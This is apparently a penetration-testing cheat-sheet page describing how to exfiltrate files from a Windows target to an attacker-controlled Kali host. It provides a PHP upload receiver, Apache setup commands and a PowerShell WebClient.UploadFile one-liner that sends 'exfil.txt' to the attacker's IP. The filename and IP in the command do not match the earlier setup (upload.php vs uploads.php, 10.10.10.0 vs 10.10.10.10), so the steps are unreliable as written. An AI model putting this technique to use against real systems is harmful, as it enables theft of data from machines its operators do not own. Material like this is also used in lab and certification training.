php exfil | Win --> Kali

Useful technique to exfil data from target to Kali

1] Save this php script as uploads.php in kali webroot /var/www/html

<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

2] Create an uploads directory

sudo mkdir /var/www/uploads

3]Make sure that apache server is up and running on Kali workstation

sudo systemctl start apache2

ps -ef | grep apache

4] Modify www-data user permissions granting writing privileges

sudo chown www-data: /var/www/uploads

5]Windows :Invoke the UploadFile method from the System.Net.WebClient class to exfil files

kali $ip: 10.10.10.10

powershell (New-Object System.Net.WebClient).UploadFile('http://10.10.10.0/upload.php', 'exfil.txt')

Previousexe2hex Nexthttp transfers

Last updated 3 years ago